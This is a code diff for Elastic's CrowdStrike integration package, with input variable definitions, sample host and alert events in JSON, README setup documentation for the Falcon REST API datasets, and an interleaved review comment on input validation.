+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details.
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - crowdstrike-host
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: false
+ title: Preserve duplicate custom fields
+ description: Preserve crowdstrike.host fields that were copied to Elastic Common Schema (ECS) fields.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/crowdstrike/data_stream/host/sample_event.json b/packages/crowdstrike/data_stream/host/sample_event.json
new file mode 100644
index 00000000000..45a14423a50
--- /dev/null
+++ b/packages/crowdstrike/data_stream/host/sample_event.json
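Review bot: `batch_size` is documented as "It must be between 1 - 5000" but nothing in the var definition enforces that, so a value of 0 or 10000 is handed straight to the CEL program and the user only finds out through API errors in the agent log. If the package spec version this package targets supports numeric bounds on integer vars, declare them here; otherwise clamp the value in `cel.yml.hbs` and say so, e.g. `description: Number of hosts requested per API call (1-5000; values outside that range are clamped).` — the template is not part of this chunk, so the clamp may already exist there. `initial_interval` and `interval` are likewise free-form `text` with no pattern, so a typo such as `24hr` surfaces only at runtime; a short note in each description that the value is validated when the policy is applied (or a pattern, if the spec allows one) would help. The `enable_request_tracer` warning that tracing writes request and response bodies, including the bearer token, to local disk is the right call and should stay as worded.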
@@ -0,0 +1,228 @@ +{ + "@timestamp": "2023-11-07T10:26:53.000Z", + "agent": { + "ephemeral_id": "5805cb9f-4413-4da3-8da7-b85cd99c2961", + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.11.0" + }, + "crowdstrike": { + "host": { + "agent": { + "load_flags": "0", + "local_time": "2023-11-07T04:51:16.678Z", + "version": "7.05.17603.0" + }, + "bios": { + "manufacturer": "ABCInc.", + "version": "2020.0.1.0.0(iBridge:22.11.000.0.0,0)" + }, + "chassis_type": { + "desc": "Laptop", + "value": "9" + }, + "cid": "92012896127c4948236ba7601b886b0", + "config_id": { + "base": "6594763", + "build": "1703", + "platform": "4" + }, + "connection_ip": "81.2.69.192", + "cpu_signature": "460517", + "device_policies": { + "device_control": { + "applied": true, + "applied_date": "2023-06-20T08:45:26.341Z", + "assigned_date": "2023-06-20T08:43:47.736Z", + "policy_id": "2f88daf0177f467dae69262a5ce71775", + "policy_type": "device-control" + }, + "firewall": { + "applied": true, + "applied_date": "2023-09-11T10:33:44.174Z", + "assigned_date": "2023-09-11T10:32:47.853Z", + "policy": { + "id": "1ee301f7e3e24e96ad6a23c73aaac1e3", + "type": "firewall" + }, + "rule_set_id": "1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.515Z", + "assigned_date": "2023-11-07T04:51:18.946Z", + "policy": { + "id": "7e3078b60976486cac5dc998808d9135", + "type": "globalconfig" + }, + "settings_hash": "f01def74" + }, + "prevention": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + }, + "remote_response": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.017Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "dabb4def99034f11b9b3d52271584c9f", + "type": "remote-response" + 
}, + "settings_hash": "8a548e5e" + }, + "sensor_update": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.659Z", + "assigned_date": "2023-11-07T04:47:43.342Z", + "policy": { + "id": "64bfa2bbcd4e46da92a66b107933da11", + "type": "sensor-update" + }, + "settings_hash": "tagged|18;101", + "uninstall_protection": "ENABLED" + } + }, + "external_ip": "81.2.69.192", + "first_seen": "2023-06-08T10:00:19.000Z", + "group_hash": "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups": [ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname": "CLM101-131.local", + "id": "3114433dbce478ca48d9a828b9b34be", + "kernel_version": "22.6.0", + "last_seen": "2023-11-07T10:25:24.000Z", + "local_ip": "81.2.69.142", + "mac_address": "14-7D-DA-AD-AC-71", + "machine_domain": "SYS", + "major_version": "22", + "meta": { + "version": "6002", + "version_string": "7:43570272778" + }, + "minor_version": "6", + "modified_timestamp": "2023-11-07T10:26:53.000Z", + "os": { + "build": "22G120", + "version": "Ventura(13)" + }, + "platform": { + "id": "1", + "name": "Mac" + }, + "policies": [ + { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + } + ], + "product_type_desc": "Workstation", + "provision_status": "Provisioned", + "reduced_functionality_mode": "no", + "serial_number": "FVFDH73HMNHX", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system": { + "manufacturer": "ABCInc.", + "product_name": "Air,1" + }, + "tags": [ + "tags" + ] + } + }, + "data_stream": { + "dataset": "crowdstrike.host", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "3114433dbce478ca48d9a828b9b34be" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "snapshot": false, + "version": "8.11.0" + }, + "event": { + 
"agent_id_status": "verified", + "category": [ + "host" + ], + "dataset": "crowdstrike.host", + "ingested": "2024-01-22T13:24:41Z", + "kind": "event", + "original": "{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-11-07T04:51:16.678Z\",\"agent_version\":\"7.05.17603.0\",\"bios_manufacturer\":\"ABCInc.\",\"bios_version\":\"2020.0.1.0.0(iBridge:22.11.000.0.0,0)\",\"chassis_type\":\"9\",\"chassis_type_desc\":\"Laptop\",\"cid\":\"92012896127c4948236ba7601b886b0\",\"config_id_base\":\"6594763\",\"config_id_build\":\"1703\",\"config_id_platform\":\"4\",\"connection_ip\":\"81.2.69.192\",\"cpu_signature\":\"460517\",\"device_id\":\"3114433dbce478ca48d9a828b9b34be\",\"device_policies\":{\"device_control\":{\"applied\":true,\"applied_date\":\"2023-06-20T08:45:26.341093915Z\",\"assigned_date\":\"2023-06-20T08:43:47.736146738Z\",\"policy_id\":\"2f88daf0177f467dae69262a5ce71775\",\"policy_type\":\"device-control\"},\"firewall\":{\"applied\":true,\"applied_date\":\"2023-09-11T10:33:44.174488832Z\",\"assigned_date\":\"2023-09-11T10:32:47.853976945Z\",\"policy_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\",\"policy_type\":\"firewall\",\"rule_set_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\"},\"global_config\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.515775409Z\",\"assigned_date\":\"2023-11-07T04:51:18.94671252Z\",\"policy_id\":\"7e3078b60976486cac5dc998808d9135\",\"policy_type\":\"globalconfig\",\"settings_hash\":\"f01def74\"},\"prevention\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"},\"remote_response\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.01735027Z\",\"assigned_date\":\"2023-06-08T10:03:49.505163572Z\",\"policy_id\":\"dabb4def99034f11b9b3d52271584c9f\",\"policy_type\":\"remote-response\",\"settings_hash\":\"8a548e5e\"},\"sensor_update\":
{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.659583066Z\",\"assigned_date\":\"2023-11-07T04:47:43.342175341Z\",\"policy_id\":\"64bfa2bbcd4e46da92a66b107933da11\",\"policy_type\":\"sensor-update\",\"settings_hash\":\"tagged|18;101\",\"uninstall_protection\":\"ENABLED\"}},\"external_ip\":\"81.2.69.192\",\"first_seen\":\"2023-06-08T10:00:19Z\",\"group_hash\":\"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77\",\"groups\":[\"182388a8dbea4c44b5e019cfd32c2695\"],\"hostname\":\"CLM101-131.local\",\"kernel_version\":\"22.6.0\",\"last_seen\":\"2023-11-07T10:25:24Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"14-7d-da-ad-ac-71\",\"machine_domain\":\"SYS\",\"major_version\":\"22\",\"meta\":{\"version\":\"6002\",\"version_string\":\"7:43570272778\"},\"minor_version\":\"6\",\"modified_timestamp\":\"2023-11-07T10:26:53Z\",\"os_build\":\"22G120\",\"os_version\":\"Ventura(13)\",\"platform_id\":\"1\",\"platform_name\":\"Mac\",\"policies\":[{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"}],\"product_type_desc\":\"Workstation\",\"provision_status\":\"Provisioned\",\"reduced_functionality_mode\":\"no\",\"serial_number\":\"FVFDH73HMNHX\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"ABCInc.\",\"system_product_name\":\"Air,1\",\"tags\":[\"tags\"]}", + "type": [ + "info" + ] + }, + "host": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "hostname": "CLM101-131.local", + "ip": [ + "81.2.69.192" + ], + "mac": [ + "14-7D-DA-AD-AC-71" + ], + "os": { + "full": "Ventura(13)", + "platform": "Mac" + } + }, + "input": 
{ + "type": "cel" + }, + "related": { + "hash": [ + "f01def74", + "f7a54ca1", + "8a548e5e", + "tagged|18;101", + "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77" + ], + "hosts": [ + "CLM101-131.local", + "SYS" + ], + "ip": [ + "81.2.69.192", + "81.2.69.142" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-host" + ] +} \ No newline at end of file diff --git a/packages/crowdstrike/docs/README.md b/packages/crowdstrike/docs/README.md index 3c24eb55630..3235ec320b3 100644 --- a/packages/crowdstrike/docs/README.md +++ b/packages/crowdstrike/docs/README.md 
@@ -1,17 +1,557 @@ # CrowdStrike Integration -This integration is for [CrowdStrike](https://www.crowdstrike.com/resources/?cs_query=type=5) products. It includes the -following datasets for receiving logs: +The [CrowdStrike](https://www.crowdstrike.com/) Falcon integration allows you to easily connect your CrowdStrike Falcon platform to Elastic for seamless onboarding of alerts and telemetry from CrowdStrike Falcon and Falcon Data Replicator. Elastic Security can leverage this data for security analytics including correlation, visualization and incident response. It provides support using three different modes for integrating CrowdStrike to the Elastic: + +1. Falcon SIEM Connector: This is a pre-built integration designed to connect CrowdStrike Falcon with Security Information and Event Management (SIEM) systems. It streamlines the flow of security data from CrowdStrike Falcon to the SIEM, providing a standardized and structured way of feeding information into the SIEM platform. It includes the following datasets for receiving logs: - `falcon` dataset: consists of endpoint data and Falcon platform audit data forwarded from [Falcon SIEM Connector](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem/). + +2. CrowdStrike REST API: This provides a programmatic interface to interact with the CrowdStrike Falcon platform. It allows users to perform various operations such as querying information about unified alerts and hosts/devices. It includes the following datasets for receiving logs: + +- `alert` dataset: It is typically used to retrieve detailed information about unified alerts generated by the CrowdStrike Falcon platform, via Falcon Intelligence Alert API - `/alerts/entities/alerts/v2`. 
+ +- `host` dataset: It retrieves all the hosts/devices in your environment providing information such as device metadata, configuration, and status generated by the CrowdStrike Falcon platform, via Falcon Intelligence Host/Device API - `/devices/entities/devices/v2`. It is more focused to provide the management and monitoring information of devices such as login details, status, policies, configuration etc. + +3. Falcon Data Replicator: This Collect events in near real time from your endpoints and cloud workloads, identities and data. CrowdStrike Falcon Data Replicator (FDR) enables you with actionable insights to improve SOC performance. FDR contains near real-time data collected by the Falcon platform's single, lightweight agent. It includes the following datasets for receiving logs: + - `fdr` dataset: consists of logs forwarded using the [Falcon Data Replicator](https://github.com/CrowdStrike/FDR). ## Compatibility -This integration supports CrowdStrike Falcon SIEM-Connector-v2.0. +This integration is compatible with both CrowdStrike Falcon SIEM-Connector-v2.0 and REST API. +For Rest API support, this module has been tested against the **CrowdStrike API Version v1/v2**. + +The minimum **kibana.version** required is **8.12.0**. + +## Setup +### To collect data from CrowdStrike REST API, the following parameters from your CrowdStrike instance are required: + +1. Client ID +2. Client Secret +3. Token url +4. API Endpoint url +5. Required scopes for each data stream : + + | Data Stream | Scope | + | ------------- | ------------- | + | Alert | read:alert | + | Host | read:host | ## Logs +### Alert + +This is the `Alert` dataset. 
+ +#### Example + +An example event for `alert` looks as following: + +```json +{ + "@timestamp": "2023-11-03T18:00:22.328Z", + "agent": { + "ephemeral_id": "532c45c9-f01e-40e0-9406-8997b9a2b29c", + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "crowdstrike": { + "alert": { + "agent_id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id": "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype": "exe", + "cid": "92012896127c4a948236ba7601b886b0", + "cloud_indicator": false, + "cmdline": "\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id": "92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence": 10, + "context_timestamp": "2023-11-03T18:00:31.000Z", + "control_graph_id": "ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids": { + "Sensor": [ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids": { + "Sensor": [ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + 
"ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp": "2023-11-03T19:00:23.985Z", + "created_timestamp": "2023-11-03T18:01:23.995Z", + "data_domains": [ + "Endpoint" + ], + "description": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device": { + "agent_load_flags": 0, + "agent_local_time": "2023-10-12T03:45:57.753Z", + "agent_version": "7.04.17605.0", + "bios_manufacturer": "ABC", + "bios_version": "F8CN42WW(V2.05)", + "cid": "92012896127c4a948236ba7601b886b0", + "config_id_base": "65994763", + "config_id_build": "17605", + "config_id_platform": 3, + "external_ip": "81.2.69.142", + "first_seen": "2023-04-07T09:36:36.000Z", + "groups": [ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo": { + "active_directory_dn_display": [ + "WinComputers", + "WinComputers\\ABC" + ], + "domain": "ABC.LOCAL" + }, + "hostname": "ABC709-1175", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "last_seen": "2023-11-03T17:51:42.000Z", + "local_ip": "81.2.69.142", + "mac_address": "AB-21-48-61-05-B2", + "machine_domain": "ABC.LOCAL", + "major_version": "10", + "minor_version": "0", + "modified_timestamp": "2023-11-03T17:53:43.000Z", + "os_version": "Windows11", + "ou": [ + "ABC", + 
"WinComputers" + ], + "platform_id": "0", + "platform_name": "Windows", + "product_type": "1", + "product_type_desc": "Workstation", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system_manufacturer": "LENOVO", + "system_product_name": "20VE" + }, + "falcon_host_link": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details": { + "cmdline": "C:\\Windows\\system32\\userinit.exe", + "filename": "userinit.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id": "4328", + "md5": "b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id": "392734873135", + "sha256": "caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp": "2023-10-30T16:49:19.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "yuvraj.mahajan" + }, + "has_script_or_module_ioc": true, + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context": [ + { + "ioc_description": 
"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source": "library_load", + "ioc_type": "hash_sha256", + "ioc_value": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type": "module" + } + ], + "is_synthetic_quarantine_disposition": true, + "local_process_id": "17076", + "logon_domain": "ABSYS", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "name": "PrewittPupAdwareSensorDetect-Lowest", + "objective": "FalconDetectionMethod", + "parent_details": { + "cmdline": "C:\\WINDOWS\\Explorer.EXE", + "filename": "explorer.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id": "1040", + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id": "392736520876", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp": "2023-11-03T18:00:32.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + }, + "parent_process_id": "392736520876", + "pattern_disposition": 2176, + "pattern_disposition_description": "Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details": { + "blocking_unsupported_or_disabled": false, + "bootup_safeguard_enabled": false, + "critical_process_disabled": false, + "detect": false, + "fs_operation_blocked": false, + "handle_operation_downgraded": false, + "inddet_mask": false, + "indicator": false, + "kill_action_failed": false, + 
"kill_parent": false, + "kill_process": false, + "kill_subprocess": false, + "operation_blocked": false, + "policy_disabled": false, + "process_blocked": true, + "quarantine_file": true, + "quarantine_machine": false, + "registry_operation_blocked": false, + "rooting": false, + "sensor_only": false, + "suspend_parent": false, + "suspend_process": false + }, + "pattern_id": "5761", + "platform": "Windows", + "poly_id": "AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time": "2023-11-03T18:00:21.000Z", + "process_id": "399748687993", + "process_start_time": "2023-11-03T18:00:13.000Z", + "product": "epp", + "quarantined_files": [ + { + "filename": "\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state": "quarantined" + } + ], + "scenario": "NGAV", + "severity": 30, + "sha1": "0000000000000000000000000000000000000000", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui": true, + "source_products": [ + "FalconInsight" + ], + "source_vendors": [ + "CrowdStrike" + ], + "status": "new", + "tactic": "MachineLearning", + "tactic_id": "CSTA0004", + "technique": "Adware/PUP", + "technique_id": "CST0000", + "timestamp": "2023-11-03T18:00:22.328Z", + "tree_id": "1931778", + "tree_root": "38687993", + "triggering_process_graph_id": "pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type": "ldt", + "updated_timestamp": "2023-11-03T19:00:23.985Z", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + } + }, + "data_stream": { + "dataset": 
"crowdstrike.alert", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "2ce412d17b334ad4adc8c1c54dbfec4b" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "agent_id_status": "verified", + "dataset": "crowdstrike.alert", + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ingested": "2024-02-21T09:17:46Z", + "kind": "alert", + "original": "{\"agent_id\":\"2ce412d17b334ad4adc8c1c54dbfec4b\",\"aggregate_id\":\"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778\",\"alleged_filetype\":\"exe\",\"cid\":\"92012896127c4a948236ba7601b886b0\",\"cloud_indicator\":\"false\",\"cmdline\":\"\\\"C:\\\\Users\\\\yuvraj.mahajan\\\\AppData\\\\Local\\\\Temp\\\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\\\pfSenseFirewallOpenVPNClients\\\\Windows\\\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\\\"\",\"composite_id\":\"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600\",\"confidence\":10,\"context_timestamp\":\"2023-11-03T18:00:31Z\",\"control_graph_id\":\"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778\",\"crawl_edge_ids\":{\"Sensor\":[\"KZcZ=__;K\\u0026cmqQ]Z=W,QK4W.9(rBfs\\\\gfmjTblqI^F-_oNnAWQ\\u0026-o0:dR/\\u003e\\u003e2J\\u003cd2T/ji6R\\u0026RIHe-tZSkP*q?HW;:leq.:kk)\\u003eIVMD36[+=kiQDRm.bB?;d\\\"V0JaQlaltC59Iq6nM?6`\\u003eZAs+LbOJ9p9A;9'WV9^H3XEMs8N\",\"KZcZA__;?\\\"cmott@m_k)MSZ^+C?.cg\\u003cLga#0@71X07*LY2teE56*16pL[=!bjF7g@0jOQE'jT6RX_F@sr#RP-U/d[#nm9A,A,W%cl/T@\\u003cW`alY1K_h%QDBBF;_e7S!!*'!\",\"KZd)iK2;s\\\\ckQl_P*d=Mo?^a7/JKc\\\\*L48169!7I5;0\\\\\\u003cH^hNG\\\"ZQ3#U3\\\"eo\\u003c\\u003e92t[f!\\u003e*b9WLY@H!V0N,BJsNSTD:?/+fY';e\\u003cOHh9AmlT?5\\u003cgGqK:*L99kat+P)eZ$HR\\\"Ql@Q!!!$!rr\",\"N6=Ks_B9Bncmur)?\\\\[fV$k/N5;:6@aB$P;R$2XAaPJ?E\\u003cG5,UfaP')8#2AY4ff+q?T?b0/RBi-YAeGmb\\u003c6Bqp[D
Zh#I(jObGkjJJaMf\\\\:#mb;BM\\\\L[g!\\\\F*M!!*'!\",\"N6B%O`'=_7d#%u\\u0026d[+LTNDs\\u003c3307?8n=GrFI:4YYGCL,cIt-Tuj!\\u0026\\u003c6:3RbC`uNjL#gW\\u0026=)E`4^/'fp*.bFX@p_$,R6.\\\"=lV*T*5Vf`c.:nkd$+YD:DJ,Ls0[sArC')K%YTc$:@kUQW5s8N\",\"N6B%s!\\\\k)ed$F6\\u003ea%iM\\\"\\u003cFTSe/eH8M:\\u003c9gf;$$.b??kpC*99aX!Lq:g6:Q3@Ga4Zrb@MaMa]L'YAt$IFBu])\\\"H^sF$r7gDPf6\\u0026CHpVKO3\\u003cDgK9,Y/e@V\\\"b\\u0026m!\\u003c\\u003c'\",\"N6CU\\u0026`%VT\\\"d$=67=h\\\\I)/BJH:8-lS!.%\\\\-!$1@bAhtVO?q4]9'9'haE4N0*-0Uh'-'f',YW3]T=jL3D#N=fJi]Pp-bWej+R9q[%h[p]p26NK8q3b50k9G:.\\u0026eM\\u003cQer\\u003e__\\\"59K'R?_=`'`rK/'hA\\\"r+L5i-*Ut5PI!!*'!\",\"N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A\\u0026FE;(naXB4h/OG\\\"%MDAR=fo41Z]rXc\\\"J-\\\\\\u0026\\u0026V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr\",\"N6CUF__;K!d$:\\\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\\\"X'\\\\AtNML2_C__7ic6,8Dc[F\\u003c0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##\\u0026$^81(P+hN*-#rf/cUs)Wb\\\"\\u003c_/?I'[##WMh'H[Rcl+!!\\u003c\\u003c'\",\"N6L[G__;K!d